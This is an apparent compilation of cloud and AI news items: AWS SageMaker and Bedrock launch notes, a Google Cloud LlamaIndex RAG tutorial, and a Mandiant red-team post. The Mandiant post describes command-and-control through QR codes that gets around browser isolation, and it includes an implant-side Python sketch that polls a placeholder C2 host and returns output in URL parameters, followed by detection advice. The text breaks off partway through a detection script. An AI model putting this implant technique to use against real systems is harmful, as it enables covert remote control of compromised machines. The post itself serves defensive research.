Until today, integrating purpose-built GenAI and ML development applications that provide specialized capabilities for a variety of model development tasks required a considerable amount of effort. Beyond investing time in due diligence to evaluate existing offerings, customers had to perform undifferentiated heavy lifting to deploy, manage, upgrade, and scale these applications. Furthermore, to adhere to rigorous security and compliance protocols, organizations need their data to stay within their security boundaries, without moving it elsewhere, for example to a Software as a Service (SaaS) application. Finally, the resulting developer experience is often fragmented, with developers switching back and forth between multiple disjointed interfaces. With SageMaker partner AI apps, you can quickly subscribe to a partner solution and seamlessly integrate the app with your SageMaker development environment. SageMaker partner AI apps are fully managed and run privately and securely in your SageMaker environment, reducing the risk of data and model exfiltration.
At launch, you will be able to boost your team’s productivity and reduce time to market by enabling: Comet, to track, visualize, and manage experiments for AI model development; Deepchecks, to evaluate quality and compliance for AI models; Fiddler, to validate, monitor, analyze, and improve AI models in production; and, Lakera, to protect AI applications from security threats such as prompt attacks, data loss and inappropriate content.
SageMaker partner AI apps are available in all currently supported regions except the AWS GovCloud (US) Regions. To learn more, please visit the SageMaker partner AI apps developer guide.
Amazon SageMaker HyperPod now provides you with centralized governance across all generative AI development tasks, such as training and inference. You have full visibility and control over compute resource allocation, ensuring the most critical tasks are prioritized and maximizing compute resource utilization, reducing model development costs by up to 40%.
With HyperPod task governance, administrators can more easily define priorities for different tasks and set limits on how many compute resources each team can use. At any given time, administrators can also monitor and audit the tasks that are running or waiting for compute resources through a visual dashboard. When data scientists create their tasks, HyperPod automatically runs them, adhering to the defined compute resource limits and priorities. For example, when training for a high-priority model needs to be completed as soon as possible but all compute resources are in use, HyperPod frees up resources from lower-priority tasks to support the training. HyperPod pauses the low-priority task, saves the checkpoint, and reallocates the freed-up compute resources. The preempted low-priority task resumes from the last saved checkpoint as resources become available again. And when a team is not fully using its resource limits, HyperPod uses those idle resources to accelerate another team’s tasks. Additionally, HyperPod is now integrated with Amazon SageMaker Studio, bringing task governance and other HyperPod capabilities into the Studio environment. Data scientists can now seamlessly interact with HyperPod clusters directly from Studio, allowing them to develop, submit, and monitor machine learning (ML) jobs on powerful accelerator-backed clusters.
Task governance for HyperPod is available in all AWS Regions where HyperPod is available: US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Stockholm), and South America (São Paulo).
Amazon SageMaker HyperPod announces flexible training plans, a new capability that allows you to train generative AI models within your timelines and budgets. Gain predictable model training timelines and run training workloads within your budget requirements, while continuing to benefit from features of SageMaker HyperPod such as resiliency, performance-optimized distributed training, and enhanced observability and monitoring.
In a few quick steps, you can specify your preferred compute instances, desired amount of compute resources, duration of your workload, and preferred start date for your generative AI model training. SageMaker then helps you create the most cost-efficient training plans, reducing time to train your model by weeks. Once you create and purchase your training plans, SageMaker automatically provisions the infrastructure and runs the training workloads on these compute resources without requiring any manual intervention. SageMaker also automatically takes care of pausing and resuming training between gaps in compute availability, as the plan switches from one capacity block to another. If you wish to remove all the heavy lifting of infrastructure management, you can also create and run training plans using SageMaker fully managed training jobs.
SageMaker HyperPod flexible training plans are available in the US East (N. Virginia), US East (Ohio), and US West (Oregon) AWS Regions. To learn more, visit: SageMaker HyperPod, documentation, and the announcement blog.
Amazon Bedrock Knowledge Bases now supports natural language querying to retrieve structured data from your data sources. With this launch, Bedrock Knowledge Bases offers an end-to-end managed workflow for customers to build custom generative AI applications that can access and incorporate contextual information from a variety of structured and unstructured data sources. Using advanced natural language processing, Bedrock Knowledge Bases can transform natural language queries into SQL queries, allowing users to retrieve data directly from the source without the need to move or preprocess the data.
Developers often face challenges integrating structured data into generative AI applications. This includes difficulties training large language models (LLMs) to convert natural language queries to SQL queries based on complex database schemas, as well as ensuring appropriate data governance and security controls are in place. Bedrock Knowledge Bases eliminates these hurdles by providing a managed natural language to SQL (NL2SQL) module. A retail analyst can now simply ask “What were my top 5 selling products last month?”, and Bedrock Knowledge Bases automatically translates that query into SQL, executes it against the database, and returns the results – or even provides a summarized narrative response. To generate accurate SQL queries, Bedrock Knowledge Bases leverages the database schema, previous query history, and other contextual information provided about the data sources.
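Structured retrieval is exposed through the existing Knowledge Bases runtime API. Here is a minimal sketch with boto3, using placeholder knowledge base and model identifiers:

import boto3

client = boto3.client("bedrock-agent-runtime", region_name="us-east-1")

# Ask a natural-language question against a knowledge base backed by a
# structured data store; Bedrock generates and runs the SQL for us.
response = client.retrieve_and_generate(
    input={"text": "What were my top 5 selling products last month?"},
    retrieveAndGenerateConfiguration={
        "type": "KNOWLEDGE_BASE",
        "knowledgeBaseConfiguration": {
            "knowledgeBaseId": "KB12345678",  # placeholder knowledge base ID
            "modelArn": "arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-3-5-sonnet-20241022-v2:0",
        },
    },
)
print(response["output"]["text"])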
Bedrock Knowledge Bases supports structured data retrieval from Amazon Redshift and Amazon SageMaker Lakehouse at this time, and is available in all commercial regions where Bedrock Knowledge Bases is supported. To learn more, visit the Bedrock Knowledge Bases documentation; for details on pricing, refer to the Amazon Bedrock pricing page.
Amazon Bedrock Marketplace provides generative AI developers access to over 100 publicly available and proprietary foundation models (FMs), in addition to Amazon Bedrock’s industry-leading, serverless models. Customers deploy these models onto SageMaker endpoints where they can select their desired number of instances and instance types. Amazon Bedrock Marketplace models can be accessed through Bedrock’s unified APIs, and models which are compatible with Bedrock’s Converse APIs can be used with Amazon Bedrock’s tools such as Agents, Knowledge Bases, and Guardrails.
Amazon Bedrock Marketplace empowers generative AI developers to rapidly test and incorporate a diverse array of emerging, popular, and leading FMs of various types and sizes. Customers can choose from a variety of models tailored to their unique requirements, which can help accelerate the time-to-market, improve the accuracy, or reduce the cost of their generative AI workflows. For example, customers can incorporate models highly-specialized for finance or healthcare, or language translation models for Asian languages, all from a single place.
Amazon Bedrock Marketplace is supported in US East (N. Virginia), US East (Ohio), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), and South America (São Paulo).
For more information, please refer to Amazon Bedrock Marketplace’s announcement blog or documentation.
Today, AWS announces that Amazon Bedrock now supports prompt caching. Prompt caching is a new capability that can reduce costs by up to 90% and latency by up to 85% for supported models by caching frequently used prompts across multiple API calls. It allows you to cache repetitive inputs and avoid reprocessing context, such as long system prompts and common examples that help guide the model’s response. When the cache is used, fewer computing resources are needed to generate output. As a result, not only can we process your request faster, but we can also pass along the cost savings from using fewer resources.
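In the Converse API, the cache boundary is marked with a cachePoint content block; everything before it (for example, a long system prompt) is cached and reused across calls. A minimal sketch, assuming a model with prompt caching enabled:

import boto3

client = boto3.client("bedrock-runtime", region_name="us-west-2")

LONG_SYSTEM_PROMPT = "You are a support assistant. " * 200  # stand-in for a long prompt

# Content before the cachePoint is cached across calls; only the user
# turn after it is reprocessed each time.
response = client.converse(
    modelId="anthropic.claude-3-5-sonnet-20241022-v2:0",
    system=[
        {"text": LONG_SYSTEM_PROMPT},
        {"cachePoint": {"type": "default"}},  # marks the cache boundary
    ],
    messages=[{"role": "user", "content": [{"text": "Summarize our refund policy."}]}],
)
print(response["output"]["message"]["content"][0]["text"])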
Amazon Bedrock is a fully managed service that offers a choice of high-performing FMs from leading AI companies via a single API. Amazon Bedrock also provides a broad set of capabilities customers need to build generative AI applications with security, privacy, and responsible AI capabilities built in. These capabilities help you build tailored applications for multiple use cases across different industries, helping organizations unlock sustained growth from generative AI while providing tools to build customer trust and data governance.
Prompt caching is now available on Claude 3.5 Haiku and Claude 3.5 Sonnet v2 in US West (Oregon) and US East (N. Virginia) via cross-region inference, and Nova Micro, Nova Lite, and Nova Pro models in US East (N. Virginia). At launch, only a select number of customers will have access to this feature. To learn more about participating in the preview, see this page. To learn more about prompt caching, see our documentation and blog.
Today, we are announcing the preview launch of Amazon Bedrock Data Automation (BDA), a new feature of Amazon Bedrock that enables developers to automate the generation of valuable insights from unstructured multimodal content such as documents, images, video, and audio to build GenAI-based applications. These insights include video summaries of key moments, detection of inappropriate image content, automated analysis of complex documents, and much more. Developers can also customize BDA’s output to generate specific insights in consistent formats required by their systems and applications.
By leveraging BDA, developers can reduce development time and effort, making it easier to build intelligent document processing, media analysis, and other multimodal data-centric automation solutions. BDA offers high accuracy at lower cost than alternative solutions, along with features such as visual grounding with confidence scores for explainability and built-in hallucination mitigation. This ensures accurate insights from unstructured, multi-modal data content. Developers can get started with BDA on the Bedrock console, where they can configure and customize output using their sample data. They can then integrate BDA’s unified multi-modal inference API into their applications to process their unstructured content at scale with high accuracy and consistency. BDA is also integrated with Bedrock Knowledge Bases, making it easier for developers to generate meaningful information from their unstructured multi-modal content to provide more relevant responses for retrieval augmented generation (RAG).
Bedrock Data Automation is available in preview in US West (Oregon) AWS Region.
To learn more, visit the Bedrock Data Automation page.
Organizations are increasingly using applications with multimodal data to drive business value, improve decision-making, and enhance customer experiences. Amazon Bedrock Guardrails now supports multimodal toxicity detection for image content, enabling organizations to apply content filters to images. This new capability with Guardrails, now in public preview, removes the heavy lifting required by customers to build their own safeguards for image data or spend cycles with manual evaluation that can be error-prone and tedious.
Bedrock Guardrails helps customers build and scale their generative AI applications responsibly for a wide range of use cases across industry verticals including healthcare, manufacturing, financial services, media and advertising, transportation, marketing, education, and much more. With this new capability, Amazon Bedrock Guardrails offers a comprehensive solution, enabling the detection and filtration of undesirable and potentially harmful image content while retaining safe and relevant visuals. Customers can now use content filters for both text and image data in a single solution with configurable thresholds to detect and filter undesirable content across categories such as hate, insults, sexual, and violence, and build generative AI applications based on their responsible AI policies.
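Image checks run through the same ApplyGuardrail API used for text. A minimal sketch with boto3, using a placeholder guardrail ID:

import boto3

client = boto3.client("bedrock-runtime", region_name="us-east-1")

with open("user_upload.png", "rb") as f:
    image_bytes = f.read()

# Evaluate an image against the guardrail's configured content filters
# before it ever reaches the model.
response = client.apply_guardrail(
    guardrailIdentifier="gr-abc123",  # placeholder guardrail ID
    guardrailVersion="1",
    source="INPUT",
    content=[{"image": {"format": "png", "source": {"bytes": image_bytes}}}],
)
print(response["action"])  # "GUARDRAIL_INTERVENED" when a filter matches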
This new capability in preview is available with all foundation models (FMs) on Amazon Bedrock that support images, including fine-tuned FMs, in 11 AWS Regions globally: US East (N. Virginia), US East (Ohio), US West (Oregon), Europe (Ireland), Europe (Frankfurt), Europe (London), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Tokyo), Asia Pacific (Mumbai), and AWS GovCloud (US-West).
Starting today, you can build ML models using natural language with Amazon Q Developer, now available in Amazon SageMaker Canvas in preview. You can now get generative AI-powered assistance through the ML lifecycle, from data preparation to model deployment. With Amazon Q Developer, users of all skill levels can use natural language to access expert guidance to build high-quality ML models, accelerating innovation and time to market.
Amazon Q Developer will break down your objective into specific ML tasks, define the appropriate ML problem type, and apply data preparation techniques to your data. Amazon Q Developer then guides you through the process of building, evaluating, and deploying custom ML models. ML models produced in SageMaker Canvas with Amazon Q Developer are production ready, can be registered in SageMaker Studio, and the code can be shared with data scientists for integration into downstream MLOps workflows.
Amazon Q Developer is available in SageMaker Canvas in preview in the following AWS Regions: US East (N. Virginia), US West (Oregon), Europe (Frankfurt), Europe (Paris), Asia Pacific (Tokyo), and Asia Pacific (Seoul). To learn more about using Amazon Q Developer with SageMaker Canvas, visit the website, read the AWS News blog, or view the technical documentation.
Amazon announces a five-year commitment of cloud technology and technical support for organizations creating digital learning solutions that expand access for underserved learners worldwide through the AWS Education Equity Initiative. While the use of educational technologies continues to rise, many organizations lack access to cloud computing and AI resources needed to accelerate and scale their work to reach more learners in need.
Amazon is committing up to $100 million in AWS credits and technical advising to help socially-minded organizations build and scale learning solutions that utilize cloud and AI technologies. This will reduce initial financial barriers and provide guidance on building and scaling AI-powered education solutions using AWS technologies.
Eligible recipients, including socially-minded edtechs, social enterprises, non-profits, governments, and corporate social responsibility teams, must demonstrate how their solution will benefit students from underserved communities. The initiative is now accepting applications.
Today, AWS announces the availability of new AWS AI Service Cards for Amazon Nova Reel; Amazon Nova Canvas; Amazon Nova Micro, Lite, and Pro; Amazon Titan Image Generator; and Amazon Titan Text Embeddings. AI Service Cards are a resource designed to enhance transparency by providing customers with a single place to find information on the intended use cases and limitations, responsible AI design choices, and performance optimization best practices for AWS AI services.
AWS AI Service Cards are part of our comprehensive development process to build services in a responsible way. They focus on key aspects of AI development and deployment, including fairness, explainability, privacy and security, safety, controllability, veracity and robustness, governance, and transparency. By offering these cards, AWS aims to empower customers with the knowledge they need to make informed decisions about using AI services in their applications and workflows. Our AI Service Cards will continue to evolve and expand as we engage with our customers and the broader community to gather feedback and continually iterate on our approach.
For more information, see the AI Service Cards for Amazon Nova Reel; Amazon Nova Canvas; Amazon Nova Micro, Lite, and Pro; Amazon Titan Image Generator; and Amazon Titan Text Embeddings.
AI agents are revolutionizing the landscape of gen AI application development. Retrieval augmented generation (RAG) has significantly enhanced the capabilities of large language models (LLMs), enabling them to access and leverage external data sources such as databases. This empowers LLMs to generate more informed and contextually relevant responses. Agentic RAG represents a significant leap forward, combining the power of information retrieval with advanced action planning. AI agents can execute complex, multi-step tasks: they reason, plan, and make decisions, then take actions to achieve their goals over multiple iterations. This opens up new possibilities for automating intricate workflows and processes, leading to increased efficiency and productivity.
LlamaIndex has emerged as a leading framework for building knowledge-driven and agentic systems. It offers a comprehensive suite of tools and functionality that facilitate the development of sophisticated AI agents. Notably, LlamaIndex provides both pre-built agent architectures that can be readily deployed for common use cases, as well as customizable workflows, which enable developers to tailor the behavior of AI agents to their specific requirements.
Today, we’re excited to announce a collaboration with LlamaIndex on open-source integrations for Google Cloud databases, including AlloyDB for PostgreSQL and Cloud SQL for PostgreSQL.
These LlamaIndex integrations, available to download from PyPI as llama-index-alloydb-pg and llama-index-cloud-sql-pg, empower developers to build agentic applications that connect to Google databases. The integrations include support for the Vector Store, Document Store, and Index Store interfaces.
In addition, developers can also access previously published LlamaIndex integrations for Firestore, including for Vector Store and Index Store.
Integration benefits
LlamaIndex supports a broad spectrum of different industry use cases, including agentic RAG, report generation, customer support, SQL agents, and productivity assistants. LlamaIndex’s multi-modal functionality extends to applications like retrieval-augmented image captioning, showcasing its versatility in integrating diverse data types. Through these use cases, joint customers of LlamaIndex and Google Cloud databases can expect to see an enhanced developer experience, complete with:
Streamlined knowledge retrieval: Using these packages makes it easier for developers to build knowledge-retrieval applications with Google databases. Developers can leverage AlloyDB and Cloud SQL vector stores to store and semantically search unstructured data to provide models with richer context. The LlamaIndex vector store integrations let you filter metadata effectively, select from vector similarity strategies, and help improve performance with custom vector indexes.
Complex document parsing: LlamaIndex’s first-class document parser, LlamaParse, converts complex document formats with images, charts and rich tables into a form more easily understood by LLMs; this produces demonstrably better results for LLMs attempting to understand the content of these documents.
Secure authentication and authorization: LlamaIndex integrations with Google databases follow the principle of least privilege, a security best practice, when creating database connection pools, authenticating, and authorizing access to database instances.
Fast prototyping: Developers can quickly build and set up agentic systems with readily available pre-built agent and tool architectures on LlamaHub.
Flow control: For production use cases, LlamaIndex Workflows provide the flexibility to build and deploy complex agentic systems with granular control of conditional execution, as well as powerful state management.
A report generation use case
Agentic RAG workflows are moving beyond simple question-and-answer chatbots. Agents can synthesize information from across sources and knowledge bases to generate in-depth reports. Report generation spans many industries: in legal, agents can do prework such as research; in financial services, agents can analyze earnings call reports. Agents mimic experts who sift through information to generate insights. And even if agent reasoning and retrieval take several minutes, automating these reports can save teams hours.
LlamaIndex provides all the key components to generate reports:
Structured output definitions, with the ability to organize outputs into report templates
Intelligent document parsing to easily extract and chunk text and other media
Knowledge base storage and integration across the customer’s ecosystem
Agentic workflows to define tasks and guide agent reasoning
Now let’s see how these concepts work, and consider how to build a report generation agent that provides daily updates on new research papers about LLMs and RAG.
1. Prepare data: Load and parse documents
The key to any RAG workflow is a well-built knowledge base. Before you store the data, you need to ensure it is clean and useful. Data for the knowledge base can come from your enterprise data or other sources. To generate reports on top research articles, developers can use the Arxiv SDK to pull free, open-access publications.
Rather than using the ArxivReader to load and convert articles to plain text, you can use LlamaParse, which supports varying paper formats, tables, and multimodal media, yielding more accurate document parsing.
To improve the knowledge base’s effectiveness, we recommend adding metadata to documents. This allows for advanced filtering or support for additional tooling. Learn more about metadata extraction.
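Here is a minimal sketch of this step, assuming the arxiv and llama-parse packages (LlamaParse requires a LLAMA_CLOUD_API_KEY in the environment); the search query and metadata field are illustrative choices, not fixed requirements.

import arxiv
from llama_parse import LlamaParse

# Pull recent open-access papers about RAG from arXiv.
client = arxiv.Client()
search = arxiv.Search(
    query="retrieval augmented generation",
    max_results=5,
    sort_by=arxiv.SortCriterion.SubmittedDate,
)

# Parse each PDF (tables, figures, and all) into LLM-friendly markdown,
# attaching a "publication_date" metadata field to filter on later.
parser = LlamaParse(result_type="markdown")  # reads LLAMA_CLOUD_API_KEY
documents = []
for paper in client.results(search):
    pdf_path = paper.download_pdf(dirpath=".")
    for doc in parser.load_data(pdf_path):
        doc.metadata["publication_date"] = paper.published.isoformat()
        documents.append(doc)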
2. Create a knowledge base: store data for retrieval
Now the data needs to be saved for long-term use. The LlamaIndex Google Cloud database integrations support storage and retrieval of a growing knowledge base.
2.1. Create a secure connection to the AlloyDB or Cloud SQL database
Utilize the AlloyDBEngine class to easily create a shareable connection pool that securely connects to your PostgreSQL instance.
Create only the necessary tables needed for your knowledge base. Creating separate tables reduces the level of access permissions that your agent needs. You can also specify a special “publication_date” metadata column that you can filter on later.
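A sketch of the connection setup follows; the class and method names track the llama-index-alloydb-pg package, but treat the exact signatures, and all project, instance, and table names, as assumptions to verify against the package documentation.

from llama_index_alloydb_pg import AlloyDBEngine, Column

# Create a shareable, secure connection pool to the AlloyDB instance.
engine = AlloyDBEngine.from_instance(
    project_id="my-project",    # placeholder values throughout
    region="us-central1",
    cluster="my-cluster",
    instance="my-primary",
    database="knowledge_base",
)

# Create only the tables the agent needs, with a filterable
# "publication_date" metadata column on the vector table.
engine.init_vector_store_table(
    table_name="research_vectors",
    vector_size=768,  # must match your embedding model's dimensionality
    metadata_columns=[Column("publication_date", "TIMESTAMP")],
)
engine.init_doc_store_table(table_name="research_docs")
engine.init_index_store_table(table_name="research_indexes")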
2.2. Customize the underlying storage with the Document Store, Index Store, and Vector Store. For the vector store, specify the metadata field “publication_date” that you created previously.
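A sketch of wiring the stores into a StorageContext and building the indexes used below; the store constructors are assumptions based on the package's documented pattern, while StorageContext, VectorStoreIndex, and SummaryIndex are standard llama-index core APIs.

from llama_index.core import StorageContext, SummaryIndex, VectorStoreIndex
from llama_index_alloydb_pg import (
    AlloyDBDocumentStore,
    AlloyDBIndexStore,
    AlloyDBVectorStore,
)

doc_store = AlloyDBDocumentStore.create_sync(engine, table_name="research_docs")
index_store = AlloyDBIndexStore.create_sync(engine, table_name="research_indexes")
vector_store = AlloyDBVectorStore.create_sync(
    engine,
    table_name="research_vectors",
    metadata_columns=["publication_date"],  # expose the column for filtering
)

storage_context = StorageContext.from_defaults(
    docstore=doc_store, index_store=index_store, vector_store=vector_store
)

# A vector index for snippet retrieval and a summary index for
# whole-document questions, built over the parsed documents.
index = VectorStoreIndex.from_documents(documents, storage_context=storage_context)
summary_index = SummaryIndex.from_documents(documents, storage_context=storage_context)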
2.3. Create tools from indexes to be used by the agent.
from llama_index.core.tools import QueryEngineTool

search_tool = QueryEngineTool.from_defaults(
    query_engine=index.as_query_engine(),
    description="Useful for retrieving specific snippets from research publications.",
)

summary_tool = QueryEngineTool.from_defaults(
    query_engine=summary_index.as_query_engine(),
    description="Useful for answering questions about research publications.",
)
3. Prompt: create an outline for the report
Reports may have requirements on sections and formatting, so the agent needs formatting instructions. Here is an example outline for a report:
outline = """
# DATE Daily report: TOPIC

## Executive Summary

## Top Challenges / Description of problems

## Summary of papers

| Title | Authors | Summary | Links |
| ----- | ------- | ------- | ----- |
| LOTUS: Enabling Semantic Queries with LLMs Over Tables of Unstructured and Structured Data | Liana Patel, Siddharth Jha, Carlos Guestrin, Matei Zaharia | … | https://arxiv.org/abs/2407.11418v1 |
"""
4. Define the workflow: outline agentic steps
Next, you define the workflow that guides the agent’s actions. In this example workflow, the agent reasons about which tool to call: the summary tool or the vector search tool. Once the agent decides it doesn’t need additional data, it exits the research loop and generates the report.
LlamaIndex Workflows provides an easy-to-use SDK for building any type of workflow:
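Below is a minimal sketch of such a workflow using the llama_index.core.workflow API; the event type, step logic, and stopping condition are illustrative stand-ins rather than the exact implementation.

from llama_index.core.workflow import (
    Event,
    StartEvent,
    StopEvent,
    Workflow,
    step,
)

class ResearchEvent(Event):
    findings: str

class ReportAgent(Workflow):
    @step
    async def research(self, ev: StartEvent) -> ResearchEvent:
        # Reason about which tool to call; a full implementation would loop
        # between the summary and vector search tools until satisfied.
        answer = await search_tool.query_engine.aquery(ev.query)
        return ResearchEvent(findings=str(answer))

    @step
    async def write_report(self, ev: ResearchEvent) -> StopEvent:
        # Format the findings into the report outline; an LLM call that
        # fills in each section would go here.
        report = outline.replace("TOPIC", "LLMs and RAG") + "\n" + ev.findings
        return StopEvent(result={"response": report})

agent = ReportAgent(timeout=300)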
Now that you’ve set up a knowledge base and defined an agent, you can set up automation to generate a report!
query = "What are the recently published RAG techniques"
report = await agent.run(query=query)

# Save the report
with open("report.md", "w") as f:
    f.write(report["response"])
There you have it! A complete report that summarizes recent research in LLM and RAG techniques. How easy was that?
Get started today
In short, these LlamaIndex integrations with Google Cloud databases enable application developers to leverage the data in their operational databases to easily build complex agentic RAG workflows. This collaboration supports Google Cloud’s long-term commitment to being an open, integrated, and innovative database platform. With LlamaIndex’s extensive user base, these integrations further expand the possibilities for developers to create cutting-edge, knowledge-driven AI agents.
Ready to get started? Take a look at the Notebook-based tutorials for each integration.
Browser isolation is a security technology where web browsing activity is separated from the user’s local device by running the browser in a secure environment, such as a cloud server or a virtual machine, and then streaming the visual content to the user’s device.
Browser isolation is often used by organizations to combat phishing threats, protect the device from browser-delivered attacks, and deter typical command-and-control (C2 or C&C) tactics used by attackers.
In this blog post, Mandiant demonstrates a novel technique that can be used to circumvent all three current types of browser isolation (remote, on-premises, and local) for the purpose of controlling a malicious implant via C2. Mandiant shows how attackers can use machine-readable QR codes to send commands from an attacker-controlled server to a victim device.
Background on Browser Isolation
The great folks at SpecterOps released a blog post earlier this year on browser isolation and how penetration testers and red team operators may work around browser isolation scenarios for ingress tool transfer, egress data transfer, and general bypass techniques. In summary, browser isolation protects users from web-based attacks by sandboxing the web browser in a secure environment (either local or remote) and streaming the visual content back to the user’s local browser. The experience is (ideally) fully transparent to the end user. According to most documentation, three types of browser isolation exist:
Remote browser isolation (RBI), the most secure and the most common variant, sandboxes the browser in a cloud-based environment.
On-premises browser isolation is similar to RBI but runs the sandboxed browser on-premises. The advantage of this approach is that on-premises web-based applications can be accessed without requiring complex cloud-to-on-premises connectivity.
Local browser isolation, or client-side browser isolation, runs the sandboxed browser in a local containerized or virtual machine environment (e.g., Docker or Windows Sandbox).
The remote browser handles everything from page rendering to executing JavaScript. Only the visual appearance of the web page is sent back to the user’s local browser (a stream of pixels). Keypresses and clicks in the local browser are forwarded to the remote browser, allowing the user to interact with the web application. Organizations often use proxies to ensure all web traffic is served through the browser isolation technology, thereby limiting egress network traffic and restricting an attacker’s ability to bypass the browser isolation.
SpecterOps detailed some of the challenges that offensive security professionals face when operating in browser isolation environments. They document possible approaches on how to circumvent browser isolation by abusing misconfigurations, such as using HTTP headers, cookies, or authentication parameters to bypass the isolation features.
Command and control (C2 or C&C) refers to an attacker’s ability to remotely control compromised systems via malicious implants. The most common channel to send commands to and from a victim device is through HTTP requests:
The implant requests a command from the attacker-controlled C2 server through an HTTP request (e.g., in the HTTP parameters, headers, or request body).
The C2 server returns the command to execute in the HTTP response (e.g., in headers or response body).
The implant decodes the HTTP response and executes the command.
The implant submits the command output back to the C2 server with another HTTP request.
The implant “sleeps” for a while, then repeats the cycle.
However, this approach presents challenges when browser isolation is in use—when making HTTP requests through a browser isolation system, the HTTP response returned to the local browser only contains the streaming engine to render the remote browser’s visual page contents. The original HTTP response (from the web server) is only available in the remote browser. The HTTP response is rendered in the remote browser, and only a stream of pixels is sent to the local browser to visually render the web page. This prevents typical HTTP-based C2 because the local device cannot decode the HTTP response (step 3).
Figure 1: Sequence diagram of browser isolation HTTP request lifecycle
In this blog post, we will explore a different approach to achieving C2 with compromised systems in browser isolation environments, working entirely within the browser isolation context.
Sending C2 Data Through Pixels
Mandiant’s Red Team developed a novel solution to this problem. Instead of returning the C2 data in the HTTP request headers or body, the C2 server returns a valid web page that visually shows a QR code. The implant then uses a local headless browser (e.g., using Selenium) to render the page, grabs a screenshot, and reads the QR code to retrieve the embedded data. By taking advantage of machine-readable QR codes, an attacker can send data from the attacker-controlled server to a malicious implant even when the web page is rendered in a remote browser.
Figure 2: Sequence diagram of C2 via QR codes
Instead of decoding the HTTP response for the command to execute, the implant visually renders the web page (from the browser isolation’s pixel streaming engine) and decodes the command from the QR code displayed on the page. The new C2 loop is as follows (a minimal implant-side sketch follows the list):
The implant controls a local headless browser via the DevTools protocol.
The implant retrieves the web page from the C2 server via the headless browser. This request is forwarded to the remote (isolated) browser and ultimately lands on the C2 server.
The C2 server returns a valid HTML web page with the command data encoded in a QR code (visually shown on the page).
The remote browser returns the pixel streaming engine back to the local browser, starting a visual stream showing the rendered web page obtained from the C2 server.
The implant waits for the page to fully render, then grabs a screenshot of the local browser. This screenshot contains the QR code.
The implant uses an embedded QR scanning library to read the QR code data from the screenshot, thereby obtaining the embedded data.
The implant executes the command on the compromised device.
The implant (again through the local browser) navigates to a new URL that includes the command output encoded in a URL parameter. This parameter is passed through to the remote browser and ultimately to the C2 server (after all, in legitimate cases, URL parameters may be required to return the correct web page). The C2 server can then decode the command output as in traditional HTTP-based C2.
The implant “sleeps” for a while, then repeats the cycle.
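To make the loop concrete, here is a minimal, illustrative sketch of the implant side using Selenium and pyzbar. This is not Mandiant’s PoC (which used Puppeteer and Cobalt Strike’s External C2); the C2 URL, the parameter name, and the 5-second wait are placeholders, and the command execution step is deliberately stubbed out.

import io
import time
import urllib.parse

from PIL import Image
from pyzbar.pyzbar import decode
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

C2_URL = "https://example.com/"  # placeholder attacker-controlled server

options = Options()
options.add_argument("--headless=new")
driver = webdriver.Chrome(options=options)  # step 1: implant-controlled browser

output = ""
while True:
    # Steps 2-4: request the page; the isolated browser renders it remotely
    # and streams only pixels back to this local browser.
    driver.get(C2_URL + "?o=" + urllib.parse.quote(output))
    time.sleep(5)  # step 5: wait for the visual stream to settle

    # Steps 5-6: screenshot the local browser and read the QR code from pixels.
    screenshot = Image.open(io.BytesIO(driver.get_screenshot_as_png()))
    codes = decode(screenshot)
    if not codes:
        continue  # step 9: no QR code visible yet; retry
    command = codes[0].data.decode()

    # Step 7 (stubbed): execute `command` on the device; step 8 then carries
    # its output back to the C2 server in the next request's URL parameter.
    output = command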
Mandiant developed a proof-of-concept (PoC) implant using Puppeteer and the Google Chrome browser in headless mode (though any modern browser could be used). We even went a step further and integrated the implant with Cobalt Strike’s External C2 feature, allowing the use of Cobalt Strike’s BEACON implant while communicating over HTTP requests and QR code responses.
Figure 3: Demo of C2 through QR codes in browser isolation scenarios (Chrome browser window would be hidden in real-world applications)
Because this technique relies on the visual content of the web page, it works in all three browser isolation types (remote, on-premises, and local).
While the PoC demonstrated the feasibility of this technique, there are some considerations and drawbacks:
During Mandiant’s testing, using QR codes with the maximum data size (2,953 bytes, 177×177 grid, Error Correction Level “L”) was infeasible, as the visual stream of the web page rendered in the local browser was of insufficient quality to reliably read the QR code contents. Mandiant was forced to fall back to QR codes containing a maximum of 2,189 bytes of content. Note: QR codes can store up to 2,953 bytes each, depending on the Error Correction Level (ECL); higher ECL settings make the QR code more reliably readable but reduce the maximum data size.
Due to the overhead of using Chrome in headless mode, the remote browser startup time, the page rendering requirements, and the stream of visual content from the remote browser back to the local browser, each request takes ~5s to reliably show and scan the QR code. This introduces significant latency in the C2 channel. For example, at the time of writing, a BEACON payload is ~323 KiB. At 2,189 bytes per QR code and 5s per request, a full BEACON payload is transferred in approximately 12m20s (~438 bytes/s, assuming every QR code is scanned successfully and every network request goes through seamlessly). While this throughput is certainly sufficient for typical C2 operations, some techniques (e.g., SOCKS proxying) become infeasible.
Other security features of browser isolation, such as domain reputation, URL scanning, data loss prevention, and request heuristics, are not considered in this blog post. Offensive security professionals will have to overcome these protection measures as well when operating in browser isolation environments.
Conclusion and Recommendations
In this blog post, Mandiant demonstrated a novel technique to establish C2 when faced with browser isolation. While this technique proves that browser isolation technologies have weaknesses, Mandiant still recommends browser isolation as a strong protection measure against other types of attacks (e.g., client-side browser exploitation, phishing, etc.). Organizations should not rely solely on browser isolation to protect themselves from web-based threats, but rather embrace a “defense in depth” strategy and establish a well-rounded cyber defense posture. Mandiant recommends the following controls:
Monitor for anomalous network traffic: Even when using browser isolation, organizations should inspect network traffic and monitor for anomalous usage. The C2 method described in this post is low-bandwidth, so transferring even small datasets requires many HTTP requests.
Monitor for browsers in automation mode: Organizations can monitor when browsers are used in automation mode (as shown in the video above) by inspecting the process command line. Chromium-based browsers use flags such as --enable-automation and --remote-debugging-port to enable other processes to control the browser through the DevTools protocol. Organizations can monitor for these flags during process creation.
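As a rough illustration of that last control, the sketch below polls process command lines with psutil; production monitoring would instead use EDR telemetry or OS-native process-creation eventing (e.g., Sysmon Event ID 1), so treat this purely as a sketch.

import time
import psutil

SUSPICIOUS_FLAGS = ("--enable-automation", "--remote-debugging-port")

seen = set()
while True:
    for proc in psutil.process_iter(attrs=["pid", "name", "cmdline"]):
        cmdline = " ".join(proc.info["cmdline"] or [])
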